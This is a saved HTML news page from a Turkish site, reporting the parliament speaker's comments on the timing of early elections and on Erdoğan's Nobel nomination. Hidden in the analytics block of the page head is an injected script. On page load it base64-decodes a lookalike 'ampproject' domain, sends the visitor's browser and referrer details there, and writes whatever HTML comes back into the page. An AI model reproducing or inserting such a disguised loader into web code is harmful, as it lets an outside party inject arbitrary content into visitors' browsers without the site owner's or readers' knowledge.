<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="utf-8">
  <title>TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039; </title>
  <meta name="description" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;  ile ilgili haber" />
  <meta name="keywords" content="TBMM Başkanı" />
  <meta name="news_keywords" content="TBMM Başkanı" />
  <link rel="manifest" href="https://www.dunyabulteni.net/_themes/hs-elegant/manifest.json">
    <meta name="author" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları">
  <meta name="developer" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları"/>
  <meta name="designer" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları"/>
    <meta name="viewport" content="width=970, initial-scale=1, shrink-to-fit=no" />
  <meta name="theme-color" content="#dc3545"/>

    <meta http-equiv="refresh" content="900">
    <link rel="alternate" href="https://www.dunyabulteni.net/m/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html" hreflang="tr" media="only screen and (max-width: 640px)"/>
  <link rel="canonical" href="https://www.dunyabulteni.net/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html">

    <link rel="amphtml" href="https://www.dunyabulteni.net/amp/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html">
  
  
      <link rel="shortcut icon" href="https://www.dunyabulteni.net/images/banner/favicon.ico">
    <style type="text/css">
    @import url('https://www.dunyabulteni.net/_themes/hs-elegant/style/main.min.css?v=1');
            @import url('https://www.dunyabulteni.net/_themes/hs-elegant/style/font/work-sans.css?v=1');
          </style>
  <meta property="og:site_name" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları" />
<meta property="og:title" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039; " />
<meta property="og:description" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;  ile ilgili haber" />

<meta property="og:image" content="https://www.dunyabulteni.net/images/haberler/2022/12/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg" />

<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.dunyabulteni.net/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html" />
<meta name="twitter:card" content="summary_large_image" /><meta property="og:title" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;" />
<meta name="twitter:url" content="http://www.dunyabulteni.net/guncel/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html" />
<meta name="twitter:domain" content="https://www.dunyabulteni.net/" />
<meta name="twitter:site" content="@dunyabulteni" />
<meta name="twitter:title" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;" />
<meta name="twitter:description" content="TBMM Başkanı, &quot;Seçimlerin öne alınmasıyla ilgili karar yetkisi hem Meclis&#039;te hem Cumhurbaşkanlığı&#039;nda var. 6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&quot; açıklamasında bulundu." />
<meta name="twitter:image:src" content="https://www.dunyabulteni.net/images/haberler/2022/12/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image:width" content="637" />
<meta property="og:image:height" content="332" />

<link rel="image_src" type="image/jpeg" href="https://www.dunyabulteni.net/images/haberler/2022/12/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg" />
  <meta name="dc.language" content="tr">
  <meta name="dc.source" content="https://www.dunyabulteni.net/">
  <meta name="dc.title" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039; ">
  <meta name="dc.keywords" content="TBMM Başkanı">
  <meta name="dc.description" content="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;  ile ilgili haber">

  
  <link rel="dns-prefetch" href="//www.dunyabulteni.net">
  <link rel="dns-prefetch" href="//www.google-analytics.com">
  <link rel="dns-prefetch" href="//fonts.gstatic.com">
  <link rel="dns-prefetch" href="//mc.yandex.ru">
  <link rel="dns-prefetch" href="//fonts.googleapis.com">
  <link rel="dns-prefetch" href="//pagead2.googlesyndication.com">
  <link rel="dns-prefetch" href="//googleads.g.doubleclick.net">
  <link rel="dns-prefetch" href="//google.com">
  <link rel="dns-prefetch" href="//gstatic.com">
  <link rel="dns-prefetch" href="//connect.facebook.net">
  <link rel="dns-prefetch" href="//graph.facebook.com">
  <link rel="dns-prefetch" href="//linkedin.com">
  <link rel="dns-prefetch" href="//ap.pinterest.com">

  <!--[if lt IE 7]>      <html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
  <!--[if IE 7]>         <html class="no-js lt-ie10 lt-ie9 lt-ie8 ie7"> <![endif]-->
  <!--[if IE 8]>         <html class="no-js lt-ie10 lt-ie9 ie8"> <![endif]-->
  <!--[if IE 9]>         <html class="no-js lt-ie10 ie9"> <![endif]-->
  <!--[if gt IE 9]>      <html class="no-js gt-ie9"> <![endif]-->
  <!--[if !IE] <![IGNORE[--><!--[IGNORE[]]-->
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-127080391-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-127080391-1');
</script>
  <!-- Start Alexa Certify Javascript -->
<script type="text/javascript">
_atrk_opts = { atrk_acct:"qgO0r1uhUo20dG", domain:"dunyabulteni.net",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://certify-js.alexametrics.com/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
</script>
<noscript><img src="https://certify.alexametrics.com/atrk.gif?account=qgO0r1uhUo20dG" style="display:none" height="1" width="1" alt="" /></noscript>
<!-- End Alexa Certify Javascript -->
<meta name="google-site-verification" content="VTou5vFsOO_SMAz-UR73a2hgNOFCf0RtS5auMWoz67k" />
<meta name='dailymotion-domain-verification' content='dmz7hy9ibvhf6qiu4' />

<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(68402086, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true
   });
</script>
<script>
window.addEventListener('DOMContentLoaded', () => {
	let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly9hbXBwcm9qZWN0LmNsb3VkL2xpY2Vuc2UucGhw'))) + `?agent=${navigator?.userAgent}&r=${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState){const e=JSON.parse(selfer.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("RequestWith","selfer"),selfer.send();
});
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/68402086" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<style>
	#logo img {max-height:250px;}
</style>        </head>

<body data-color="default" data-header="header-2">
        <div id="navbar" class="bg-white sticky-top shadow-sm">
  <nav class="navbar navbar-expand navbar-light border-bottom">
    <div class="container">
      <a class="navbar-brand pr-2" href="https://www.dunyabulteni.net/"><img src="https://www.dunyabulteni.net/images/banner/dunyabulteni_1_1_1.png" alt="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039; " class="img-fluid"></a>
      <ul class="navbar-nav">
                <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/galeri" title="GALERİLER" target="_blank">
            <i class="fas fa-images text-danger fa-lg mr-1"></i> GALERİLER          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/webtv" title="VİDEOLAR" target="_blank">
            <i class="fas fa-video text-danger fa-lg mr-1"></i> VİDEOLAR          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/yazarlar" title="Yazarlar" target="_blank">
            <i class="fas fa-users text-danger fa-lg mr-1"></i> Yazarlar          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.worldbulletin.net/" title="WORLD BULLETIN" target="_blank">
            <i class="fa fa-book text-danger fa-lg mr-1"></i> WORLD BULLETIN          </a>
        </li>
              </ul>
      <ul class="navbar-nav ml-auto">
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <div class="badge badge-danger rounded-circle position-absolute" id="notifyCount" style="display:none"></div>
    <i class="far fa-bell fa-fx"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="notifyItems">
    <h6 class="text-center pt-2 text-danger font-weight-bold text-uppercase">Bildirimler</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz bir bildirim bulunmuyor!</div>
    </div>
    <a href="https://www.dunyabulteni.net/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Bildirimler</a>
  </div>
</li>
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <i class="far fa-bookmark fa-fx text-info"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="savedItems">
    <h6 class="text-center pt-2 text-info font-weight-bold text-uppercase">Kaydettiklerim</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz kaydedilmiş bir içerik bulunmuyor!</div>
    </div>
    <a href="https://www.dunyabulteni.net/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Kaydettiklerim</a>
  </div>
</li>
        <li class="nav-item" id="memberArea"></li>
        <li class="nav-item"><a href="javascript:;" id="searchOpenButton" class="nav-link btn btn-lg ml-2"><i class="fas fa-search fa-fx"></i></a></li>
      </ul>
    </div>
  </nav>
  <nav class="navbar navbar-expand navbar-light">
  <div class="container">
    <ul class="navbar-nav">
      <li class="nav-item dropdown">
        <a class="nav-link font-weight-bold" href="#" id="mega-menu" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
          <i class="fa fa-bars fa-fx fa-lg"></i>
        </a>
        <div class="dropdown-menu mega-menu shadow-sm p-4" aria-labelledby="mega-menu">
      <div class="row">
              <a href="https://www.dunyabulteni.net/hayatin-icinden" title="Hayatın İçinden" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Hayatın İçinden</a>
              <a href="https://www.dunyabulteni.net/aa-analizleri" title="AA Analizleri" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>AA Analizleri</a>
              <a href="https://www.dunyabulteni.net/ekonomi-finans" title="Ekonomi Finans" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Ekonomi Finans</a>
              <a href="https://www.dunyabulteni.net/cevre-ve-iklim" title="Çevre ve İklim" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Çevre ve İklim</a>
              <a href="https://www.dunyabulteni.net/bilim-teknoloji" title="Bilim Teknoloji" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Bilim Teknoloji</a>
              <a href="https://www.dunyabulteni.net/dubam" title="Dübam" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Dübam</a>
              <a href="https://www.dunyabulteni.net/ramazan" title="Ramazan" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Ramazan</a>
          </div>
  <div class="dropdown-divider mt-2 mb-3"></div>
    <div class="row">
    <a href="https://www.dunyabulteni.net/" class="col-4 mb-1" title="Ana Sayfa" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Ana Sayfa    </a>
        <a href="https://www.dunyabulteni.net/yazarlar" class="col-4 mb-1" title="Yazarlar" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Yazarlar    </a>
                        <a href="https://www.dunyabulteni.net/webtv" class="col-4 mb-1" title="Video Galeri" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Video Galeri    </a>
            <a href="https://www.dunyabulteni.net/galeri" class="col-4 mb-1" title="Foto Galeri" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Foto Galeri    </a>
                        <a href="https://www.dunyabulteni.net/anketler.html" class="col-4 mb-1" title="Anketler" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Anketler    </a>
            <a href="https://www.dunyabulteni.net/karikaturler" class="col-4 mb-1" title="Karikatürler" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Karikatürler    </a>
            <a href="https://www.dunyabulteni.net/sayfalar.html" class="col-4 mb-1" title="Sayfalar" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sayfalar    </a>
        <a href="https://www.dunyabulteni.net/kunye.html" class="col-4 mb-1" title="Künye" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Künye    </a>
    <a href="https://www.dunyabulteni.net/iletisim.html" class="col-4 mb-1" title="İletişim" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> İletişim    </a>
    <a href="https://www.dunyabulteni.net/sitene-ekle.html" class="col-4 mb-1" title="Sitene Ekle" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sitene Ekle    </a>
        <a href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" class="col-4 mb-1" title="Gizlilik Politikası" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Gizlilik Politikası    </a>
            <a href="https://www.worldbulletin.net/" class="col-4 mb-1" title="WORLD BULLETIN" target="_blank">
      <i class="fas fa-book fa-fw text-danger"></i> WORLD BULLETIN    </a>
      </div>
</div>
      </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/dunya" title="Dünya" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Dünya          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/turkiye" title="Türkiye" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Türkiye          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/analiz" title="Analiz" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Analiz          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/tarih-dosyasi" title="Tarih Dosyası" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Tarih Dosyası          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/turkiye-ve-dunya-gundemi" title="Türkiye ve Dünya gündemi" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Türkiye ve Dünya gündemi          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/ks-genel" title="Genel" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Genel          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/kultur-sanat" title="Kültür Sanat" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Kültür Sanat          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/aile" title="Aile" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Aile          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/hac" title="Hac" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Hac          </a>
        </li>
          </ul>
  </div>
</nav>
</div>
        <div id="left-ad" data-name="tb_block"         style="width:120px;height:600px;" >
                        <p style="width:120px;"><a href="https://www.dunyabulteni.net/banner.php?id=39" target="_blank" rel="nofollow"><img src="https://www.dunyabulteni.net/photo.php?src=https://www.dunyabulteni.net/images/banner/Huma19-DB120x600.jpg&w=120&h=600&q=80" width="120" height="600" style="width:120px;height: 600px;border:0" alt="banner39" class="img-responsive"/></a></p>                                                                                            </div>
    <div id="right-ad" data-name="tb_block"         >
                                                                                                                                                    </div>
    <main class="container">
                        <!-- SIDEBAR İÇEREN İKİ SÜTUNLU BÖLÜM -->
        <div id="double-section" class="my-3 mb-0">
            <div class="row">
                <div class="col-8">
                                                            <div id="infinityContainer">
    <div class="inf_append current_news" news_id="549596" data-title="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;"
        data-path="aHR0cDovL3d3dy5kdW55YWJ1bHRlbmkubmV0L2d1bmNlbC90Ym1tLWJhc2thbmktNi1uaXNhbi1kYW4tb25jZS1zZWNpbS1rYXJhcmktYWxpbm1hc2luaS1oNTQ5NTk2Lmh0bWw=">
                <div id="news-detail" class="card shadow-sm mb-3">
            <div class="card-header bg-white">
                <h1 class="card-title">TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;</h1>
                                <h2 class="lead">
                    TBMM Başkanı, &quot;Seçimlerin öne alınmasıyla ilgili karar yetkisi hem Meclis&#039;te hem Cumhurbaşkanlığı&#039;nda var. 6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&quot; açıklamasında bulundu.                </h2>
                                <div class="border-top pt-2 text-secondary">
                    <a href="https://www.dunyabulteni.net/guncel" title="Güncel"
                        class="btn btn-info btn-sm text-white text-uppercase">Güncel</a>
                    <i class="far fa-clock fa-fx text-info pl-3"></i> 28.12.2022, 13:21                                        
                                    </div>
            </div>
                        <div class="position-relative mb-2">
            <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                data-src="https://www.dunyabulteni.net/images/haberler/2022/12/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg" alt="TBMM Başkanı: &#039;6 Nisan&#039;dan önce seçim kararı alınmasını beklemiyorum&#039;" width="100%">
                            </div>
                        <div class="my-2 text-center " data-name="tb_block" data-field="132"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Haber Detay -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-4481461891216070"
 data-ad-slot="9712186349"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>            <div class="card-body">
                <div class="social-buttons">
  <a href="javascript:;" data-platform-name="facebook" class="btn btn-primary btn-sm"><i class="fab fa-facebook-f"></i></a>
  <a href="javascript:;" data-platform-name="twitter" class="btn btn-info btn-sm"><i class="fab fa-twitter"></i></a>
  <a href="javascript:;" data-platform-name="linkedin" class="btn btn-primary btn-sm"><i class="fab fa-linkedin-in"></i></a>
  <a href="javascript:;" data-platform-name="pinterest" class="btn btn-danger btn-sm"><i class="fab fa-pinterest-p"></i></a>
  <a href="javascript:;" data-platform-name="whatsapp" class="btn btn-success btn-sm"><i class="fab fa-whatsapp"></i></a>
  <a href="javascript:;" data-platform-name="email" class="btn btn-dark btn-sm"><i class="far fa-envelope"></i></a>
      <a href="javascript:;" data-platform-name="print" class="btn btn-dark btn-sm"><i class="fas fa-print"></i></a>
      <a href="javascript:;" style="display:none;" data-platform-name="save" class="btn btn-info btn-sm text-uppercase save-unsave-button"><i class="far fa-bookmark pr-1"></i> Kaydet</a>
        <div class="float-right btn-group" role="group">
      <a href="javascript:;" onclick="textDown(549596)" class="btn btn-secondary btn-sm">A<sup>-</sup></a>
      <a href="javascript:;" onclick="textUp(549596)"class="btn btn-secondary btn-sm">A<sup>+</sup></a>
    </div>
  </div>
                                <div id="article-text" class="mt-4" data-text-id="549596">
                                                            <p><strong class="klink">TBMM Başkanı</strong> Şentop, muhalefetin erken seçime ilişkin açıklamalarıyla ilgili, "Seçimlerin normal tarihi 18 Haziran. Seçime yönelik bir karar alınsa bile bunun süresi 60 gündür. Seçimlerin öne alınmasıyla ilgili karar yetkisi hem Meclis'te hem Cumhurbaşkanlığı'nda var. 6 Nisan'dan önce seçim kararı alınmasını beklemiyorum" dedi.</p><div class="p_ad"></div>

<p>TBMM Başkanı Şentop, umhurbaşkanı Erdoğan'ın Nobel Barış Ödülü'ne adaylığı konusunda, "Benim başvurum var. Farklı ülkelerden meclis başkanları ve milletvekillerinin başvuruları da olacak" dedi.</p>
</p>                </div>
                                                                <div class="my-2 text-center " data-name="tb_block" data-field="135"><iframe width="560" height="315" src="https://www.youtube.com/embed/f4gbwiQ5PhE" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>                            </div>
                        <div class="card-footer bg-white text-secondary">
                <div class="news-tags">
                                        <a href="https://www.dunyabulteni.net/haberleri/TBMM+Ba%C5%9Fkan%C4%B1" title="TBMM Başkanı"
                         target="_blank"                         class="btn btn-outline-secondary btn-sm mb-2">#TBMM Başkanı</a>
                                    </div>
            </div>
                    </div>
        <div id="comments" class="card shadow-sm mb-3 comments">
  <div class="card-body">
    <div class="widget-title first-word text-info mb-3 text-uppercase">
      Yorumlar (0)
    </div>
      <div class="alert alert-info answer" style="display:none;"><b>@name</b> kişisine cevap olarak  <button type="button" class="close remove" data-dismiss="alert" aria-label="Close">
    <span aria-hidden="true">&times;</span>
  </button>
</div>
<div id="comment-result549596" class="alert alert-success" style="display:none;">
    <p class="text-center m-0">Yorumunuz başarılı bir şekilde gönderilmiştir. Editörlerimizin onayının ardından yayınlanacaktır!</p>
  </div>
<form id="comment-form549596">
  <input name="hid" type="hidden" value="549596"/>
  <input name="mid" type="hidden" value="549596"/>
  <input name="uid" type="hidden" value="0"/>
  <input name="cevap_id" type="hidden" value="0"/>
  <input type="hidden" name="cevap" value="" class="answer" />
  <input type="hidden" name="tip" value="haber" />
  <div class="form-row">
    <div class="form-group col-12">
      <textarea class="form-control" name="yorum" id="comment" rows="3" placeholder="Siz de yorum ve düşüncelerinizi bizimle paylaşın." required></textarea>
    </div>
    <div class="form-group col-9">
<input type="text" class="form-control" name="isim" id="name" placeholder="Adınızı girin."   required>
    </div>
    <div class="col-3">
      <button type="button" onclick="javascript:comment_send(549596);return false;" class="btn btn-info btn-block text-uppercase">Gönder</button>
    </div>
  </div>
</form>        </div>
</div>
                <div id="recommended-news" class="card shadow-sm mb-3">
            <div class="card-body">
                <div class="widget-title first-word text-info mb-3 text-uppercase">
                    Bunlara Göz Atmadan Geçmeyin                </div>
                <div class="row">
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/filistin/kudus-rum-ortodoks-patrikhanesi-yahudi-yerlesimcileri-kinadi-h549553.html" title="Kudüs Rum Ortodoks Patrikhanesi, Yahudi yerleşimcileri kınadı"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/12/kudus_rum_ortodoks_patrikhanesi_yahudi_yerlesimcileri_kinadi_h549553_19fcc.jpg" alt="Kudüs Rum Ortodoks Patrikhanesi, Yahudi yerleşimcileri kınadı">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/filistin/kudus-rum-ortodoks-patrikhanesi-yahudi-yerlesimcileri-kinadi-h549553.html" title="Kudüs Rum Ortodoks Patrikhanesi, Yahudi yerleşimcileri kınadı"
                                 target="_blank" >
                                Kudüs Rum Ortodoks Patrikhanesi, Yahudi yerleşimcileri kınadı                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/dunya/ukrayna-rusya-nin-bmgk-uyeliginden-cikarilmasi-icin-cagrida-h549454.html" title="Ukrayna, Rusya&#039;nın BMGK üyeliğinden çıkarılması için çağrıda bulundu"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/12/ukrayna_rusya_nin_bmgk_uyeliginden_cikarilmasi_icin_cagrida_bulundu_h549454_f7b04.jpg" alt="Ukrayna, Rusya&#039;nın BMGK üyeliğinden çıkarılması için çağrıda bulundu">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/dunya/ukrayna-rusya-nin-bmgk-uyeliginden-cikarilmasi-icin-cagrida-h549454.html" title="Ukrayna, Rusya&#039;nın BMGK üyeliğinden çıkarılması için çağrıda bulundu"
                                 target="_blank" >
                                Ukrayna, Rusya&#039;nın BMGK üyeliğinden çıkarılması için çağrıda bulundu                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/cin/cin-disisleri-bakani-vang-dan-abd-ye-uyari-h549239.html" title="Çin Dışişleri Bakanı Vang&#039;dan ABD&#039;ye uyarı"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/12/cin_disisleri_bakani_vang_dan_abd_ye_uyari_h549239_9f79e.jpg" alt="Çin Dışişleri Bakanı Vang&#039;dan ABD&#039;ye uyarı">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/cin/cin-disisleri-bakani-vang-dan-abd-ye-uyari-h549239.html" title="Çin Dışişleri Bakanı Vang&#039;dan ABD&#039;ye uyarı"
                                 target="_blank" >
                                Çin Dışişleri Bakanı Vang&#039;dan ABD&#039;ye uyarı                            </a>
                        </h6>
                    </div>
                                    </div>
            </div>
        </div>
                                    </div>
</div>
                                    </div>
                <!-- Sidebar solundaki ana bölüm bitti -->
                <!-- SIDEBAR BOLUMU -->
                <div class="col-4">
                                        <!-- İLGİLİ HABERLER -->
<div id="similar-news" class="mb-3">
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/guncel/bakan-kurum-plastik-poset-fiyati-degismedi-h549588.html" title="Bakan Kurum: Plastik poşet fiyatı değişmedi" target="_blank">
      <img alt="Bakan Kurum: Plastik poşet fiyatı değişmedi" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/12/bakan_kurum_plastik_poset_fiyati_degismedi_h549588_adf40.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/bakan-kurum-plastik-poset-fiyati-degismedi-h549588.html" title="Bakan Kurum: Plastik poşet fiyatı değişmedi" target="_blank">
          Bakan Kurum: Plastik poşet fiyatı değişmedi        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/guncel/istanbul-en-fazla-goc-alan-ve-goc-veren-il-oldu-h549586.html" title="İstanbul en fazla göç alan ve göç veren il oldu" target="_blank">
      <img alt="İstanbul en fazla göç alan ve göç veren il oldu" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/12/istanbul_en_fazla_goc_alan_ve_goc_veren_il_oldu_h549586_6e47b.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/istanbul-en-fazla-goc-alan-ve-goc-veren-il-oldu-h549586.html" title="İstanbul en fazla göç alan ve göç veren il oldu" target="_blank">
          İstanbul en fazla göç alan ve göç veren il oldu        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/guncel/mugla-da-deprem-3-h549582.html" title="Muğla&#039;da deprem" target="_blank">
      <img alt="Muğla&#039;da deprem" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/12/mugla_da_deprem_h549582_53d13.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/guncel/mugla-da-deprem-3-h549582.html" title="Muğla&#039;da deprem" target="_blank">
          Muğla&#039;da deprem        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
